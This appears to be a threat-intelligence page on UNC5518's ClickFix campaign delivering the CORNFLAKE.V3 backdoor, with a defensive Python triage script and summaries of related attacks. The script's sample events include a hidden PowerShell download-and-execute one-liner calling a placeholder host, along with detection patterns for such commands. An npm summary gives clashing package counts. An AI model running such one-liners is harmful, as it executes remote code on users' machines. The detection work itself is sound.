UNC5518 Access-as-a-Service Scheme Deploys CORNFLAKE.V3 Backdoor
Summary
UNC5518, a threat actor tracked by Mandiant, has been deploying the CORNFLAKE.V3 backdoor via the ClickFix social engineering tactic and fake CAPTCHA pages. This access-as-a-service scheme provides initial access to systems, which is then monetized by other threat groups, including UNC5774 and UNC4108. The backdoor supports multiple payload types and uses Cloudflare tunnels to evade detection. The attack chain begins with users interacting with compromised search results or malicious ads, leading them to fake CAPTCHA pages. Users are then tricked into executing a malicious PowerShell script, which downloads and executes CORNFLAKE.V3. The backdoor collects system information and can execute various payloads, including additional backdoors and credential-harvesting scripts. The CORNFLAKE.V3 backdoor is an updated version of CORNFLAKE.V2, featuring enhanced capabilities such as host persistence and support for additional payload types. The scheme has been observed since at least 2024, with multiple threat actors leveraging the initial access provided by UNC5518.
Timeline
- 21.08.2025 19:25 · 1 article
UNC5518 Deploys CORNFLAKE.V3 Backdoor via ClickFix Tactic
UNC5518 has been observed deploying the CORNFLAKE.V3 backdoor using the ClickFix social engineering tactic and fake CAPTCHA pages. The backdoor supports multiple payload types and uses Cloudflare tunnels to evade detection. The scheme provides initial access to systems, which is then monetized by other threat groups, including UNC5774 and UNC4108. The attack chain begins with users interacting with compromised search results or malicious ads, leading them to fake CAPTCHA pages. Users are then tricked into executing a malicious PowerShell script, which downloads and executes CORNFLAKE.V3. The backdoor collects system information and can execute various payloads, including additional backdoors and credential-harvesting scripts.
Source: Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages · thehackernews.com · 21.08.2025 19:25
Information Snippets
All snippets first reported 21.08.2025 19:25; source: Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages · thehackernews.com · 21.08.2025 19:25 (1 source, 1 article).
- UNC5518 uses the ClickFix tactic to trick users into executing a malicious PowerShell script via the Windows Run dialog box.
- The initial infection vector involves fake CAPTCHA pages and compromised search results or malicious ads.
- CORNFLAKE.V3 supports the execution of various payload types, including executables, DLLs, JavaScript files, batch scripts, and PowerShell commands.
- The backdoor collects basic system information and transmits it to an external server via Cloudflare tunnels.
- CORNFLAKE.V3 achieves persistence on the host through Windows Registry changes.
- The backdoor delivers multiple payloads, including an Active Directory reconnaissance utility, a Kerberoasting script, and another backdoor named WINDYTWIST.SEA.
- UNC5774 and UNC4108 are among the threat groups leveraging the initial access provided by UNC5518.
- UNC5774 is financially motivated and delivers CORNFLAKE as a way to deploy various subsequent payloads.
- UNC4108 uses PowerShell to deploy tools like VOLTMARKER and NetSupport RAT.
- CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, featuring host persistence and support for additional payload types.
- The backdoor's progenitor was a C-based downloader that used TCP sockets for C2 communications and only supported DLL payloads.
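The behaviours listed above (a script host launched from the Run dialog, a download-and-execute one-liner, persistence through a Registry Run key) are things a defender can triage from endpoint telemetry. The following is an added Python example and is not code from this page, from Mandiant or from The Hacker News. The event fields are assumptions loosely modelled on process-creation and registry-set events, the command lines, paths and SID are constructed samples, and the scoring thresholds are arbitrary starting points to be tuned against real data.

```python
"""Heuristic triage of process-creation and registry events for ClickFix-style
activity. Added illustration: field names, indicator lists and thresholds are
assumptions, not derived from CORNFLAKE.V3 samples."""
import re
from dataclasses import dataclass
from typing import List, Optional

# The Run dialog launches its child under the interactive shell (assumption).
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "node.exe"}
# Command-line fragments common to download-and-execute one-liners.
DOWNLOAD_EXEC = [
    r"invoke-webrequest", r"\biwr\b", r"downloadstring", r"downloadfile",
    r"invoke-expression", r"\biex\b", r"frombase64string",
    r"-e(nc|ncodedcommand)?\s", r"-w(indowstyle)?\s+hidden", r"https?://",
]
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\",
                           re.IGNORECASE)
THRESHOLD = 3  # arbitrary; raise or lower after measuring on real telemetry


@dataclass
class Event:
    kind: str            # "process" or "registry"
    image: str = ""      # process: image path
    parent: str = ""     # process: parent image path
    cmdline: str = ""    # process: full command line
    target: str = ""     # registry: key\value being set
    details: str = ""    # registry: data written


@dataclass
class Finding:
    rule: str
    score: int
    summary: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process(ev: Event) -> Optional[Finding]:
    """Script host spawned interactively plus download/execute markers."""
    if _basename(ev.image) not in SCRIPT_HOSTS:
        return None
    score = 2 if _basename(ev.parent) in INTERACTIVE_PARENTS else 0
    hits = [p for p in DOWNLOAD_EXEC if re.search(p, ev.cmdline, re.IGNORECASE)]
    score += len(hits)
    if score < THRESHOLD:
        return None
    return Finding("clickfix_like_launch", score,
                   f"{_basename(ev.parent)} -> {_basename(ev.image)}: {ev.cmdline}")


def score_registry(ev: Event) -> Optional[Finding]:
    """Run-key value pointing at a script host or a user-writable location."""
    if not RUN_KEY.search(ev.target):
        return None
    tokens = [_basename(t.strip('"')) for t in ev.details.split()]
    uses_script_host = any(t in SCRIPT_HOSTS for t in tokens)
    user_writable = bool(USER_WRITABLE.search(ev.details))
    if not (uses_script_host or user_writable):
        return None
    score = 2 + int(uses_script_host) + int(user_writable)
    return Finding("run_key_persistence", score, f"{ev.target} = {ev.details}")


def triage(events: List[Event]) -> List[Finding]:
    findings = []
    for ev in events:
        f = score_process(ev) if ev.kind == "process" else score_registry(ev)
        if f:
            findings.append(f)
    return findings


# Constructed sample events (no real paths, hosts or SIDs).
SAMPLE_EVENTS = [
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe",
          cmdline=r'powershell -w hidden -c "iwr https://cdn.example.invalid/p.txt | iex"'),
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe",
          cmdline=r'powershell -NoProfile -c "Get-ChildItem C:\Users"'),
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\System32\services.exe",
          cmdline=r'powershell -c "iwr https://updates.example.invalid/manifest.json -OutFile m.json"'),
    Event("registry",
          target=r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
          details=r'"C:\Users\alice\AppData\Roaming\nodejs\node.exe" C:\Users\alice\AppData\Roaming\nodejs\run.js'),
    Event("registry",
          target=r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
          details=r'"C:\Program Files\Vendor\Updater.exe" /quiet'),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.rule}] score={f.score} {f.summary}")
```

Only the first and fourth sample events are flagged: an interactive PowerShell launch without download markers, and a download by a service-spawned PowerShell without an interactive parent, both stay below the threshold, which keeps the heuristic from firing on ordinary administration while still catching the Run-dialog plus download-and-execute combination the page describes.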
Similar Happenings
FileFix Attack Using Steganography to Deploy StealC Infostealer
A new FileFix social engineering campaign impersonates Meta account suspension warnings to trick users into installing the StealC infostealer malware. The attack uses steganography to hide malicious scripts and executables within a JPG image. The campaign targets various credentials, cryptocurrency wallets, and cloud services. The FileFix technique abuses the File Explorer address bar to execute PowerShell commands, bypassing traditional detection methods. The attack was discovered by Acronis and observed over a two-week period, with multiple variants using different payloads and domains. The StealC malware aims to steal sensitive information from infected devices, including browser credentials, messaging app data, and cryptocurrency wallets. The FileFix technique was created by red team researcher mr.d0x and has been previously used by the Interlock ransomware gang. The attack uses a multilingual phishing site to trick users into copying and pasting a malicious command into the File Explorer address bar. The campaign abuses Bitbucket repositories to host malicious components, leveraging trust in the platform to bypass detection. The FileFix campaign is the most widespread, customized, and sophisticated to date, targeting users in over 16 countries. The phishing site has been translated into at least 16 different languages. The attack chain involves a phishing email impersonating Facebook security, warning users of account suspension. The attack uses AI-generated images in the steganography process. The FileFix technique is more elegant and less suspicious than ClickFix, using File Explorer instead of the Run dialog. The FileFix attack offers a broader range of high-value targets due to its use of File Explorer. Security researcher Eliad Kimhy predicts an increase in FileFix attacks in the near future.
Supply Chain Attack Targeting npm Registry Compromises 40 Packages
A supply chain attack targeting the npm registry has compromised over 187 packages maintained by multiple developers. The attack uses a malicious script (bundle.js) to steal credentials from developer machines. The compromised packages include various npm modules used in different projects. The attack is capable of targeting both Windows and Linux systems. The malicious script scans for secrets using TruffleHog's credential scanner and transmits them to an external server controlled by the attackers. Developers are advised to audit their environments and rotate credentials if the affected packages are present.
UNC6040 and UNC6395 Target Salesforce Platforms in Data Theft Campaigns
The FBI has issued an alert about two cybercriminal groups, UNC6040 and UNC6395, targeting Salesforce platforms for data theft and extortion. UNC6395 exploited compromised OAuth tokens for the Salesloft Drift application, while UNC6040 used vishing campaigns and modified Salesforce tools to breach Salesforce instances. Both groups have been active since at least October 2024, impacting multiple organizations. UNC6040 has been linked to extortion activities, with Google attributing these to a separate cluster, UNC6240, which has claimed to be the ShinyHunters group. The ShinyHunters group, along with Scattered Spider and LAPSUS$, recently announced they are going dark, but experts warn that the threat persists. UNC6040 impersonated corporate IT support personnel to gain access to Salesforce environments and used modified versions of Salesforce's Data Loader to exfiltrate data. Salesforce re-enabled integrations with Salesloft technologies, except for the Drift app, which remains disabled.
Active exploitation of CVE-2025-5086 in DELMIA Apriso
CVE-2025-5086, a critical deserialization flaw in Dassault Systèmes DELMIA Apriso Manufacturing Operations Management (MOM) software, is being actively exploited. The vulnerability, with a CVSS score of 9.0, affects versions from Release 2020 through Release 2025. Exploitation attempts have been observed, targeting the /apriso/WebServices/FlexNetOperationsService.svc/Invoke endpoint with a Base64-encoded payload. The payload decodes to a GZIP-compressed Windows executable that deploys a malicious program designed to spy on user activities. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, advising Federal Civilian Executive Branch (FCEB) agencies to apply updates by October 2, 2025. The malware, identified as Trojan.MSIL.Zapchast.gen, captures keyboard input, takes screenshots, and gathers information about active applications. This information is then sent to the attacker via various means, including email, FTP, and HTTP. The exploit involves sending a malicious SOAP request to vulnerable endpoints. The malicious requests were observed originating from the IP 156.244.33[.]162.
Resurfaced ChillyHell macOS Backdoor Discovered
A new version of the ChillyHell modular backdoor malware targeting macOS has been discovered. The malware, first seen in 2022, was used in attacks against Ukrainian officials and has now resurfaced with updated capabilities. ChillyHell provides remote access, payload delivery, and password brute-forcing. The malware was notarized by Apple in 2021 and has been publicly hosted on Dropbox since then. The malware disguises itself as an executable applet and deploys as a persistent backdoor, capable of retrieving sensitive data and evading detection. It employs multiple persistence mechanisms and can communicate over different protocols. It also features timestamping to cover its tracks. Apple has revoked the notarization of the developer certificates associated with the malware after being notified. ChillyHell is written in C++ and targets Intel architectures. It is attributed to an uncategorized threat cluster dubbed UNC4487, which has been active since at least October 2022. UNC4487 is suspected to be an espionage actor targeting Ukrainian government entities.